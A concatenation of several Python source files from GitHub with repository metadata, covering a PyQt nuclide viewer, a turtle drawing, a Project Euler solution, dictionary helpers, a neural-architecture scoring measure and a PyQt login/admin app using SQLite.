sizeHint(self):\n return self.minimumSizeHint()\n\n def minimumSizeHint(self):\n return QSize(BlockWidgetNuclide.XMARGIN, BlockWidgetNuclide.YMARGIN)\n\n def paintEvent(self, event=None):\n painter = QPainter(self)\n painter.setRenderHint(QPainter.Antialiasing)\n painter.setRenderHint(QPainter.TextAntialiasing)\n # 视口与窗口\n painter.setViewport(0, 0, BlockWidgetNuclide.YMARGIN, BlockWidgetNuclide.YMARGIN)\n painter.setWindow(0, 0, 
BlockWidgetNuclide.YMARGIN, BlockWidgetNuclide.YMARGIN)\n\n rect = QRectF(0, 0, self.height(), self.height())\n painter.setPen(Qt.NoPen)\n painter.setBrush(QColor(Qt.blue).lighter(170))\n painter.drawRect(rect)\n # Text for Z, name, symbol\n font = QFont(\"Combria\", 45)\n font.setWeight(QFont.Bold)\n painter.setFont(font)\n painter.setPen(Qt.black)\n painter.drawText(rect, Qt.AlignCenter, \"{}\".format(self.nuclide.element))\n font = QFont(\"Courier New\", 15)\n font.setWeight(QFont.Bold)\n painter.setFont(font)\n painter.setPen(Qt.black)\n painter.drawText(rect, Qt.AlignLeft, \"{}\".format(self.nuclide.A))\n painter.drawText(rect, Qt.AlignBottom | Qt.AlignCenter, \"{0:.2f}\".format(\n float(self.nuclide.mass_defect[\"value\"])/KEV_TO_MASS + self.nuclide.A))\n\n'''\n单个元素控件子类\n'''\n\nclass SingleWidgetNuclide(QDialog):\n\n def __init__(self, nuclide, parent=None):\n super(SingleWidgetNuclide, self).__init__(parent)\n\n self.nuclide = nuclide\n self.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))\n\n # 上端控件\n topWidget = BlockWidgetNuclide(self.nuclide)\n\n # 下端标签页控件\n self.propertyTable = QTableWidget()\n self.propertyTable.clear()\n self.propertyTable.setRowCount(5)\n self.propertyTable.setColumnCount(2)\n self.propertyTable.verticalHeader().setVisible(False)\n self.propertyTable.horizontalHeader().setVisible(False)\n self.propertyTable.setAlternatingRowColors(True)\n self.propertyTable.setEditTriggers(QTableWidget.NoEditTriggers)\n self.propertyTable.setFocusPolicy(Qt.NoFocus)\n header = self.propertyTable.horizontalHeader() # 设置列宽\n header.setSectionResizeMode(0, QHeaderView.ResizeToContents)\n header.setSectionResizeMode(1, QHeaderView.Stretch)\n\n # 给出各行数据\n item = QTableWidgetItem(\"Mass\")\n self.propertyTable.setItem(0, 0, item)\n try:\n item = QTableWidgetItem(\"{0:.5f} u\".format(float(self.nuclide.mass_defect[\"value\"])/KEV_TO_MASS\n + self.nuclide.A))\n except ValueError:\n item = QTableWidgetItem(\"{0:.5f}{} u\".format(self.nuclide.A, self.nuclide.mass_defect[\"value\"]))\n finally:\n self.propertyTable.setItem(0, 1, item)\n item = QTableWidgetItem(\"Mass Excess\")\n self.propertyTable.setItem(1, 0, item)\n item = QTableWidgetItem(\"{} +/- {} keV\".format(self.nuclide.mass_defect[\"value\"],\n self.nuclide.mass_defect[\"uncertainity\"]))\n self.propertyTable.setItem(1, 1, item)\n item = QTableWidgetItem(\"Half Life\")\n self.propertyTable.setItem(2, 0, item)\n item = QTableWidgetItem(\"{} +/- {} {}\".format(\n self.nuclide.half_life[\"value\"], self.nuclide.half_life[\"uncertainity\"],\n self.nuclide.half_life[\"unit\"]))\n self.propertyTable.setItem(2, 1, item)\n item = QTableWidgetItem(\"Spin\")\n self.propertyTable.setItem(3, 0, item)\n item = QTableWidgetItem(\"{}\".format(self.nuclide.gs_spin[\"value\"]))\n self.propertyTable.setItem(3, 1, item)\n item = QTableWidgetItem(\"Comment\")\n self.propertyTable.setItem(4, 0, item)\n if self.nuclide.comment:\n item = QTableWidgetItem(\"{}\".format(self.nuclide.comment.nodeValue))\n else:\n item = QTableWidgetItem(\" \")\n self.propertyTable.setItem(4, 1, item)\n\n # TODO 衰变模式,激发核的情况\n self.decaymodeTable = QTableWidget()\n decaymode = self.nuclide.decay_modes\n row = len(decaymode)\n self.decaymodeTable = QTableWidget()\n self.decaymodeTable.clear()\n self.decaymodeTable.setRowCount(row)\n self.decaymodeTable.setColumnCount(1)\n self.decaymodeTable.verticalHeader().setVisible(False)\n self.decaymodeTable.horizontalHeader().setVisible(False)\n self.decaymodeTable.setAlternatingRowColors(True)\n 
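        # The decay-mode strings filled in below are made human-readable via
        # GREEK_DICT, which maps 'a' -> α (alpha), 'b' -> β (beta) and
        # 'EC' -> ε (epsilon), so e.g. a mode labelled 'b-' is displayed as 'β-'.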
self.decaymodeTable.setEditTriggers(QTableWidget.NoEditTriggers)\n self.decaymodeTable.setFocusPolicy(Qt.NoFocus)\n header = self.decaymodeTable.horizontalHeader() # 设置列宽\n header.setSectionResizeMode(0, QHeaderView.Stretch)\n for i, v in enumerate(decaymode):\n v2 = v[\"mode\"]\n for key in GREEK_DICT:\n v2 = v2.replace(key, GREEK_DICT[key])\n item = QTableWidgetItem(\"{:5s} {} {}+/-{} %\".format(\n v2, v[\"relation\"], v[\"value\"], v[\"uncertainity\"]))\n self.decaymodeTable.setItem(i, 0, item)\n\n\n # 使用列表给出数据,使用Tab标签式给出不同分类\n tabWidget = QTabWidget()\n commonWidget = QWidget()\n commonLayout = QHBoxLayout()\n commonLayout.addWidget(self.propertyTable)\n commonWidget.setLayout(commonLayout)\n tabWidget.addTab(commonWidget, \"Common\")\n decaymodeWidget = QWidget()\n decaymodeLayout = QHBoxLayout()\n decaymodeLayout.addWidget(self.decaymodeTable)\n decaymodeWidget.setLayout(decaymodeLayout)\n tabWidget.addTab(decaymodeWidget, \"Decay Mode\")\n\n grid = QGridLayout()\n grid.addWidget(topWidget, 0, 0)\n grid.addWidget(tabWidget, 1, 0)\n self.setLayout(grid)\n\n self.setWindowTitle(self.nuclide.element)\n\n def closeEvent(self, event):\n self.setMouseTracking(True)\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QApplication(sys.argv)\n nuclides = Nuclide.NuclideLibrary()\n form = SingleWidgetNuclide(nuclides.getNuclide(7, 4))\n form.setWindowTitle(\"GridTest\")\n form.show()\n app.exec_()","repo_name":"Gamin03/PeriodTable","sub_path":"singlewidgetNuclide.pyw","file_name":"singlewidgetNuclide.pyw","file_ext":"pyw","file_size_in_byte":7089,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"24973348128","text":"speed(0)\npenup()\nsetposition(0,-200)\nradius=int(input(\"Radius of bottom snowball?: \"))\ndef make_snowman(radius):\n color(\"gray\")\n make_circle(1)\n nav(2)\n make_circle(2)\n nav(1)\n make_circle(4)\ndef nav(mult):\n left(90)\n forward(radius * mult)\n right(90)\ndef make_circle(div):\n begin_fill()\n circle(radius / div)\n end_fill()\nmake_snowman(radius)","repo_name":"CRTC-Computer-Engineering/CRTC-Python-Examples","sub_path":"CodeHS/2/13/6/Snowman-Travis.py","file_name":"Snowman-Travis.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"4235828780","text":"'''\nCounting rectangles\n\nrectangle:\na * b\n\nsub-rectangle:\n1 * 1\n1 * 2\n...\n1 * a\n2 * 1\n2 * 2\n...\n2 * a\n...\nb * 1\nb * 2\nb * a\n\nnumber of sub rectangle x * y = (a-x+1) * (b-y+1)\n\n2772\n'''\n\ndef countSubRectangle(a, b):\n count = 0\n for x in range(1, a+1):\n for y in range(1, b+1):\n count += (a - x + 1) * (b - y + 1)\n return count\n\n\ndef solution():\n target = 2000000\n minDiff = target\n resultA, resultB = 0, 0\n for a in range(30, 2000):\n for b in range(30, 2000):\n rects = countSubRectangle(a, b)\n diff = abs(rects - target)\n if diff < minDiff:\n minDiff = diff\n resultA, resultB = a, b\n print(resultA, resultB, minDiff)\n if rects > target:\n break\n print(resultA, resultB, countSubRectangle(resultA, resultB))\n\n return resultA * resultB\n\n\nif __name__ == '__main__':\n print('Result:', solution())\n","repo_name":"pz325/ProjectEuler","sub_path":"app/solutions/problem85.py","file_name":"problem85.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12634412349","text":"def get_keys(x):\n if type(x) == list:\n map_keys = 
map(lambda y: list(y.keys())[0], x)\n return list(map_keys)\n else:\n return list(x.keys())\n\ndef get_values(x):\n if type(x) == list:\n map_keys = map(lambda y: list(y.values())[0], x)\n return list(map_keys)\n else:\n return list(x.values())\n\ndef create_dict_from_variables(keys, values):\n d = {}\n for index, key in enumerate(keys):\n d[key] = values[index]\n return d\n\ndef get_object_by_keys(dictionary, keys):\n if not keys: return None\n if type(keys)==list:\n key = keys.pop(0)\n result = dictionary.get(key)\n if not result: return result\n if not keys: return result\n return get_object_by_keys(result, keys)\n else:\n return dictionary.get(keys)\n","repo_name":"waynshang/price_alert","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"13015138806","text":"import torch\nimport numpy as np\n\nfrom . import measure\n\n\ndef get_batch_jacobian(net, x, target, device, split_data):\n x.requires_grad_(True)\n\n N = x.shape[0]\n for sp in range(split_data):\n st=sp*N//split_data\n en=(sp+1)*N//split_data\n y = net(x[st:en])\n y.backward(torch.ones_like(y))\n\n jacob = x.grad.detach()\n x.requires_grad_(False)\n return jacob, target.detach()\n\ndef eval_score(jacob, labels=None):\n corrs = np.corrcoef(jacob)\n v, _ = np.linalg.eig(corrs)\n k = 1e-5\n return -np.sum(np.log(v + k) + 1./(v + k))\n\n@measure('jacob_cov', bn=True)\ndef compute_jacob_cov(net, inputs, targets, split_data=1, loss_fn=None):\n device = inputs.device\n # Compute gradients (but don't apply them)\n net.zero_grad()\n\n jacobs, labels = get_batch_jacobian(net, inputs, targets, device, split_data=split_data)\n jacobs = jacobs.reshape(jacobs.size(0), -1).cpu().numpy()\n\n try:\n jc = eval_score(jacobs, labels)\n except Exception as e:\n print(e)\n jc = np.nan\n\n return jc\n","repo_name":"SamsungLabs/zero-cost-nas","sub_path":"foresight/pruners/measures/jacob_cov.py","file_name":"jacob_cov.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"6"} +{"seq_id":"1510517264","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 2 09:13:52 2023\r\n\r\n@author: ASUS\r\n\"\"\"\r\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\r\nimport os\r\nfrom PyQt5 import QtWidgets, uic, QtCore, QtGui\r\nimport pandas as pd\r\nfrom PyQt5.QtWidgets import QTableWidget, QTableWidgetItem,QStyle\r\nfrom PyQt5.QtCore import QSize\r\nfrom PyQt5.QtCore import QUrl\r\nfrom PyQt5.QtWidgets import QApplication, QVBoxLayout, QFrame\r\nfrom PyQt5.QtWidgets import QMessageBox\r\nimport folium\r\nfrom folium.plugins import MarkerCluster\r\nfrom folium import plugins\r\nfrom folium.plugins import MiniMap\r\nfrom folium.raster_layers import TileLayer\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\r\nimport matplotlib.pyplot as plt\r\nfrom PyQt5.QtGui import QIcon ,QPixmap, QRegion\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtGui import QDoubleValidator ,QBrush ,QColor\r\nimport csv\r\nfrom datetime import datetime\r\nfrom PyQt5.QtCore import QDateTime\r\nfrom PyQt5.QtWidgets import QApplication, QDialog, QLabel, QLineEdit, QPushButton, QVBoxLayout, QMenu, QAction\r\nfrom PyQt5.QtSql import QSqlDatabase, QSqlQuery\r\nimport sys\r\nimport sqlite3\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nimport pickle\r\nfrom PyQt5.QtWidgets import QMainWindow, 
QFileDialog\r\nfrom PyQt5.QtGui import QImage\r\nimport io\r\nfrom PyQt5 import QtWidgets, uic, QtCore\r\nfrom PyQt5.QtCore import QByteArray, QBuffer, QIODevice\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtSql import QSqlDatabase, QSqlQuery,QSqlQueryModel\r\nfrom apscheduler.schedulers.background import BackgroundScheduler\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\r\nfrom matplotlib.figure import Figure\r\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\r\nimport threading\r\nimport random \r\nimport sys\r\nimport numpy as np\r\nfrom smtp import Mission\r\nfrom PyQt5.QtCore import Qt, QStringListModel\r\nfrom PyQt5.QtWidgets import QCompleter\r\nfrom matplotlib.ticker import MaxNLocator\r\nfrom matplotlib.colors import LinearSegmentedColormap\r\ndef resource_path(relative_path):\r\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\r\n try:\r\n # PyInstaller creates a temp folder and stores path in _MEIPASS\r\n base_path = sys._MEIPASS2\r\n except Exception:\r\n base_path = os.path.abspath(\".\")\r\n\r\n return os.path.join(base_path, relative_path)\r\nclass admin(QtWidgets.QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n uic.loadUi(resource_path('admin.ui'), self)\r\n self.pushButton.clicked.connect(self.selectImage)\r\n self.pushButton_2.clicked.connect(self.saveToDatabase)\r\n self.pushButton_3.clicked.connect(self.login)\r\n # Initialize your database connection\r\n self.db = QSqlDatabase.addDatabase(\"QSQLITE\")\r\n self.db.setDatabaseName(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n if not self.db.open():\r\n print(\"Failed to connect to the database.\")\r\n sys.exit(1)\r\n\r\n # Connect button signals to slots\r\n self.pushButton.clicked.connect(self.selectImage)\r\n self.pushButton_2.clicked.connect(self.saveToDatabase)\r\n \r\n #styling the tabel\r\n self.tableWidget.setStyleSheet('''\r\n QTableWidget {\r\n background-color: rgb(19, 51, 76);\r\n border: 1px solid rgb(19, 51, 76);\r\n color: rgb(246, 246, 233);\r\n }\r\n \r\n QTableWidget::item {\r\n padding: 5px;\r\n border: 1px solid rgb(253, 95, 0) ;\r\n }\r\n \r\n QHeaderView::section {\r\n background-color: rgb(253, 95, 0);\r\n font-weight: bold;\r\n border: 1px solid rgb(253, 95, 0);\r\n color:rgb(0, 87, 146);\r\n }\r\n''')\r\n #styling the scroll bar\r\n self.tableWidget.verticalScrollBar().setStyleSheet('''\r\n QScrollBar:vertical {\r\n background: transparent;\r\n width: 5px;\r\n border-radius: 7px;\r\n margin: 20px 0 20px 0;\r\n }\r\n\r\n QScrollBar::handle:vertical {\r\n background: rgb(19, 51, 76);\r\n border-radius: 7px;\r\n min-height: 20px;\r\n }\r\n\r\n QScrollBar::add-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::sub-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {\r\n background: none;\r\n }\r\n''')\r\n #styling the scroll bar\r\n self.tableWidget.horizontalScrollBar().setStyleSheet('''\r\n QScrollBar:horizontal {\r\n background: transparent;\r\n width: 5px;\r\n border-radius: 7px;\r\n margin: 20px 0 20px 0;\r\n }\r\n\r\n QScrollBar::handle:horizontal {\r\n background: rgb(19, 51, 76);\r\n border-radius: 7px;\r\n min-height: 20px;\r\n }\r\n\r\n QScrollBar::add-line:horizontal {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::sub-line:horizontal {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n 
QScrollBar::add-page:horizontal, QScrollBar::sub-page:horizontal {\r\n background: none;\r\n }\r\n''') \r\n # Connect to the database\r\n conn = sqlite3.connect(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n cursor = conn.cursor()\r\n \r\n # Retrieve data from the database table\r\n cursor.execute(\"SELECT username,password FROM users\")\r\n data = cursor.fetchall()\r\n\r\n # Set the number of rows and columns in the table\r\n self.tableWidget.setRowCount(len(data))\r\n self.tableWidget.setColumnCount(len(data[0]) + 1) # Add 1 for the delete button column\r\n # Assuming all rows have the same number of columns\r\n\r\n # Add data to the table\r\n for i, row in enumerate(data):\r\n for j, value in enumerate(row):\r\n item = QTableWidgetItem(str(value))\r\n self.tableWidget.setItem(i, j, item)\r\n # Add a delete button to the last column\r\n delete_button = QPushButton(\"\")\r\n delete_button.setIcon(QIcon(resource_path('icons\\\\icons8-trash-52.png')))\r\n delete_button.setStyleSheet(''' QPushButton { background-color: rgb(253, 95, 0);\r\n font: 900 8pt Arial Black;\r\n color:rgb(0, 87, 146);\r\n border: 1px solid rgb(237, 131, 0);\r\n border-radius:25%;\r\n }\r\n QPushButton:hover {\r\n background-color:qlineargradient(spread:repeat, x1:0, y1:1, x2:1, y2:0, stop:0.28436 rgba(253, 95, 0, 255), stop:0.890995 rgba(255, 193, 35, 255));\r\n border: 1px solid gray;\r\n box-shadow: 5px 10px rgb(255, 175, 15);\r\n }''')\r\n delete_button.clicked.connect(lambda _, row=i: self.deleteRow(row)) # Connect the delete button to the deleteRow method\r\n self.tableWidget.setCellWidget(i, len(row), delete_button) \r\n self.tableWidget.setColumnWidth(0, 100)\r\n self.tableWidget.setColumnWidth(1, 100)\r\n self.tableWidget.setColumnWidth(2, 50)\r\n header_label = QTableWidgetItem(\"\")\r\n self.tableWidget.setHorizontalHeaderItem(2, header_label)\r\n # Set table properties\r\n header_labels = [description[0] for description in cursor.description]\r\n self.tableWidget.setHorizontalHeaderLabels(header_labels)\r\n self.tableWidget.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)\r\n self.tableWidget.setSizeAdjustPolicy(QTableWidget.AdjustToContents)\r\n self.tableWidget.setEditTriggers(QTableWidget.NoEditTriggers)\r\n self.tableWidget.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n self.tableWidget.verticalHeader().setVisible(False)\r\n\r\n # Close the database connection\r\n conn.close()\r\n \r\n def deleteRow(self, row):\r\n # Get the item in the first column (assumed to be the primary key)\r\n item = self.tableWidget.item(row, 0)\r\n username = item.text() # Assuming the primary key is an integer\r\n\r\n # Delete the row from the table\r\n self.tableWidget.removeRow(row)\r\n\r\n # Delete the row from the database\r\n conn = sqlite3.connect(resource_path(\"spdb.db\") ) # Replace with the actual database file name\r\n cursor = conn.cursor()\r\n cursor.execute(\"DELETE FROM users WHERE username = ?\", (username,))\r\n conn.commit()\r\n conn.close()\r\n def login(self):\r\n self.window1=Window1()\r\n self.hide()\r\n self.window1.show()\r\n def selectImage(self):\r\n file_dialog = QFileDialog(self)\r\n file_dialog.setWindowTitle(\"Select Image\")\r\n file_dialog.setNameFilter(\"Images (*.png *.jpg *.jpeg *.gif)\")\r\n\r\n try:\r\n if file_dialog.exec_():\r\n self.selected_file = file_dialog.selectedFiles()[0]\r\n except KeyboardInterrupt:\r\n print(\"Program execution interrupted.\")\r\n sys.exit(0) # Exit the program gracefully\r\n def saveToDatabase(self):\r\n username = 
self.lineEdit.text()\r\n password = self.lineEdit_2.text()\r\n email = self.lineEdit_3.text()\r\n role = self.comboBox.currentText()\r\n if not username or not password:\r\n print(\"Please enter both username and password.\")\r\n self.label_3.setText(\"*Please enter both username and password.\")\r\n return\r\n\r\n # Set a default image if no image is selected\r\n if not hasattr(self, 'selected_file'):\r\n default_image_path =resource_path( \"icons8-username-96.png\" ) # Replace with the path to your default image\r\n self.selected_file = default_image_path\r\n\r\n # Check if the username already exists in the database\r\n query = QSqlQuery()\r\n query.prepare(\"SELECT username FROM users WHERE username = ?\")\r\n query.addBindValue(username)\r\n if query.exec_() and query.next():\r\n self.label_3.setText(\"*Username already exists. Please try another one.\")\r\n return\r\n\r\n # Convert the image to binary data\r\n image = QImage(self.selected_file)\r\n byte_array = QByteArray()\r\n buffer = QBuffer(byte_array)\r\n buffer.open(QIODevice.WriteOnly)\r\n image.save(buffer, \"PNG\")\r\n\r\n # Implement your logic to save the data to the database\r\n # Here, you can use your database connection and execute the necessary SQL statements\r\n\r\n # Example code to insert username, password, email, role, and image into a table named 'users'\r\n query.prepare(\"INSERT INTO users (username, password, email, role, image) VALUES (?, ?, ?, ?, ?)\")\r\n query.addBindValue(username)\r\n query.addBindValue(password)\r\n query.addBindValue(email)\r\n query.addBindValue(role)\r\n query.addBindValue(byte_array)\r\n\r\n if query.exec_():\r\n print(\"Data saved to the database.\")\r\n self.label_3.setText(\"\")\r\n self.lineEdit.clear()\r\n self.lineEdit_2.clear()\r\n self.lineEdit_3.clear()\r\n self.db.close()\r\n\r\n # Connect button signals to slots\r\n self.pushButton.clicked.connect(self.selectImage)\r\n self.pushButton_2.clicked.connect(self.saveToDatabase)\r\n \r\n #styling the tabel\r\n self.tableWidget.setStyleSheet('''\r\n QTableWidget {\r\n background-color: rgb(19, 51, 76);\r\n border: 1px solid rgb(19, 51, 76);\r\n color: rgb(246, 246, 233);\r\n }\r\n \r\n QTableWidget::item {\r\n padding: 5px;\r\n border: 1px solid rgb(253, 95, 0) ;\r\n }\r\n \r\n QHeaderView::section {\r\n background-color: rgb(253, 95, 0);\r\n font-weight: bold;\r\n border: 1px solid rgb(253, 95, 0);\r\n color:rgb(0, 87, 146);\r\n }\r\n''') \r\n #styling the scroll bar\r\n self.tableWidget.verticalScrollBar().setStyleSheet('''\r\n QScrollBar:vertical {\r\n background: transparent;\r\n width: 5px;\r\n border-radius: 7px;\r\n margin: 20px 0 20px 0;\r\n }\r\n\r\n QScrollBar::handle:vertical {\r\n background: rgb(19, 51, 76);\r\n border-radius: 7px;\r\n min-height: 20px;\r\n }\r\n\r\n QScrollBar::add-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::sub-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {\r\n background: none;\r\n }\r\n''')\r\n #styling the scroll bar\r\n self.tableWidget.horizontalScrollBar().setStyleSheet('''\r\n QScrollBar:horizontal {\r\n background: transparent;\r\n width: 5px;\r\n border-radius: 7px;\r\n margin: 20px 0 20px 0;\r\n }\r\n\r\n QScrollBar::handle:horizontal {\r\n background: rgb(19, 51, 76);\r\n border-radius: 7px;\r\n min-height: 20px;\r\n }\r\n\r\n QScrollBar::add-line:horizontal {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::sub-line:horizontal {\r\n border: 
none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:horizontal, QScrollBar::sub-page:horizontal {\r\n background: none;\r\n }\r\n''') \r\n\r\n \r\n # Connect to the database\r\n conn = sqlite3.connect(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n cursor = conn.cursor()\r\n \r\n # Retrieve data from the database table\r\n cursor.execute(\"SELECT username,password FROM users\")\r\n data = cursor.fetchall()\r\n\r\n # Set the number of rows and columns in the table\r\n self.tableWidget.setRowCount(len(data))\r\n self.tableWidget.setColumnCount(len(data[0]) + 1) # Add 1 for the delete button column\r\n # Assuming all rows have the same number of columns\r\n\r\n # Add data to the table\r\n for i, row in enumerate(data):\r\n for j, value in enumerate(row):\r\n item = QTableWidgetItem(str(value))\r\n self.tableWidget.setItem(i, j, item)\r\n # Add a delete button to the last column\r\n delete_button = QPushButton(\"\")\r\n delete_button.setIcon(QIcon(resource_path(\"icons\\\\icons8-trash-52.png\")))\r\n delete_button.setStyleSheet(''' QPushButton { background-color: rgb(253, 95, 0);\r\n font: 900 8pt Arial Black;\r\n color:rgb(0, 87, 146);\r\n border: 1px solid rgb(237, 131, 0);\r\n border-radius:25%;\r\n }\r\n QPushButton:hover {\r\n background-color:qlineargradient(spread:repeat, x1:0, y1:1, x2:1, y2:0, stop:0.28436 rgba(253, 95, 0, 255), stop:0.890995 rgba(255, 193, 35, 255));\r\n border: 1px solid gray;\r\n box-shadow: 5px 10px rgb(255, 175, 15);\r\n }''')\r\n delete_button.clicked.connect(lambda _, row=i: self.deleteRow(row)) # Connect the delete button to the deleteRow method\r\n self.tableWidget.setCellWidget(i, len(row), delete_button) \r\n self.tableWidget.setColumnWidth(0, 100)\r\n self.tableWidget.setColumnWidth(1, 100)\r\n self.tableWidget.setColumnWidth(2, 50)\r\n header_label = QTableWidgetItem(\"\")\r\n self.tableWidget.setHorizontalHeaderItem(2, header_label)\r\n # Set table properties\r\n header_labels = [description[0] for description in cursor.description]\r\n self.tableWidget.setHorizontalHeaderLabels(header_labels)\r\n self.tableWidget.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)\r\n self.tableWidget.setSizeAdjustPolicy(QTableWidget.AdjustToContents)\r\n self.tableWidget.setEditTriggers(QTableWidget.NoEditTriggers)\r\n self.tableWidget.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n self.tableWidget.verticalHeader().setVisible(False)\r\n\r\n # Close the database connection\r\n conn.close()\r\n \r\n\r\nclass Window1(QtWidgets.QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n uic.loadUi(resource_path('login.ui'), self)\r\n self.pushButton.clicked.connect(self.show_main)\r\n self.pushButton_2.clicked.connect(self.show_admin)\r\n \r\n def show_main(self):\r\n # Get the username and password from the input fields\r\n username = self.lineEdit.text()\r\n password = self.lineEdit_2.text()\r\n \r\n db = QSqlDatabase.addDatabase(\"QSQLITE\")\r\n db.setDatabaseName(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n\r\n if not db.open():\r\n print(\"Failed to connect to the database.\")\r\n sys.exit(1)\r\n\r\n # Query the database for the username and password\r\n query = QSqlQuery()\r\n query.prepare(\"SELECT * FROM users WHERE username = :username AND password = :password\")\r\n query.bindValue(\":username\", username)\r\n query.bindValue(\":password\", password)\r\n\r\n if query.exec_() and query.next():\r\n id_user = query.value(0)\r\n role = query.value(5) # Assuming the role column is at 
index 5 in the query result\r\n\r\n            if role == \"department head\":\r\n                msg_box = QMessageBox()\r\n                msg_box.setStyleSheet(\r\n                    \"QMessageBox { background-color: #F6F6E9; }\"\r\n                    \"QMessageBox QLabel { color: #13334C; }\"\r\n                    \"QMessageBox QPushButton {\"\r\n                    \"    background-color: #005792;\"\r\n                    \"    color: #F6F6E9;\"\r\n                    \"    padding: 5px 10px;\"\r\n                    \"    border: none;\"\r\n                    \"}\"\r\n                    \"QMessageBox QPushButton:hover { background-color: #FD5F00; }\"\r\n)\r\n                msg_box.setWindowTitle(\"Department Head Role Selection\")\r\n                msg_box.setIcon(QMessageBox.Information) \r\n                msg_box.setText(\"Choose an option:\")\r\n                plan_button = msg_box.addButton(\"Plan Missions\", QMessageBox.AcceptRole)\r\n                msg_box.addButton(\"Log Normally\", QMessageBox.RejectRole)\r\n                msg_box.exec_()\r\n                \r\n                # exec_() does not return a button role, so compare the clicked button instead\r\n                if msg_box.clickedButton() == plan_button:\r\n                    # Open the plan missions window or perform any other action\r\n                    self.planmession=Mission()\r\n                    self.hide()\r\n                    self.planmession.show()\r\n                else:\r\n                    self.show_mainwi(username, id_user, db)\r\n\r\n            else:\r\n                self.show_mainwi(username, id_user, db)\r\n\r\n        else:\r\n            print(\"Login failed\")\r\n            self.label_4.setText(\"Incorrect username or password.\")\r\n\r\n        db.commit()\r\n        db.close()\r\n\r\n    def show_mainwi(self,username, id_user, db):\r\n        # Query the database for the image_data\r\n        image_query = QSqlQuery()\r\n        image_query.prepare(\"SELECT image FROM users WHERE username = ?\")\r\n        image_query.addBindValue(username)\r\n\r\n        if image_query.exec_() and image_query.next():\r\n            image_blob = image_query.value(0)\r\n\r\n            if image_blob is not None:\r\n                pixmap = QPixmap()\r\n                pixmap.loadFromData(image_blob)\r\n\r\n                # Assuming you have the original pixmap stored in 'pixmap'\r\n                scaled_pixmap = pixmap.scaled(40, 40, aspectRatioMode=Qt.KeepAspectRatio,\r\n                                              transformMode=Qt.SmoothTransformation)\r\n\r\n\r\n                self.mainwi = mainwi()\r\n                self.hide()\r\n                self.mainwi.show()\r\n\r\n                # Apply rounded border radius to the label\r\n                mask = QRegion(self.mainwi.label_19.rect(), QRegion.Ellipse)\r\n                self.mainwi.label_19.setMask(mask)\r\n                self.mainwi.label_19.setStyleSheet(\"border-radius: 20%;\")\r\n                self.mainwi.label_19.setPixmap(scaled_pixmap)\r\n                self.mainwi.toolButton.setText(username)\r\n                self.mainwi.label_19.setGeometry(self.mainwi.frame.width() - 50, 10, 40, 40)\r\n                self.mainwi.toolButton.setGeometry(self.mainwi.frame.width() - 110, 10, 100, 40)\r\n                self.mainwi.listWidget.clear()\r\n\r\n                # Retrieve ongoing missions for the current user\r\n                msquery = QSqlQuery()\r\n                msquery.prepare(\"SELECT * FROM messions WHERE assigned_to = ? 
AND state = 'ongoing'\")\r\n msquery.addBindValue(id_user)\r\n msquery.exec_()\r\n\r\n while msquery.next():\r\n mission_id = msquery.value(0)\r\n description = msquery.value(1)\r\n end_date = msquery.value(3)\r\n end_date = datetime.strptime(end_date, \"%Y-%m-%d %H:%M:%S\")\r\n remaining_time = end_date - datetime.now()\r\n\r\n if remaining_time.days > 365:\r\n remaining_text = f\"{remaining_time.days // 365} years\"\r\n elif remaining_time.days > 30:\r\n remaining_text = f\"{remaining_time.days // 30} months\"\r\n elif remaining_time.days > 0:\r\n remaining_text = f\"{remaining_time.days} days\"\r\n elif remaining_time.seconds > 3600:\r\n remaining_text = f\"{remaining_time.seconds // 3600} hours\"\r\n else:\r\n remaining_text = f\"{remaining_time.seconds // 60} minutes\"\r\n # Create a list item and make it checkable\r\n item = QtWidgets.QListWidgetItem(f\"{description} (Remaining Time: {remaining_text})\")\r\n item.setFlags(item.flags() | QtCore.Qt.ItemIsUserCheckable)\r\n item.setCheckState(QtCore.Qt.Unchecked) # Initial state is unchecked\r\n item.setData(Qt.UserRole, 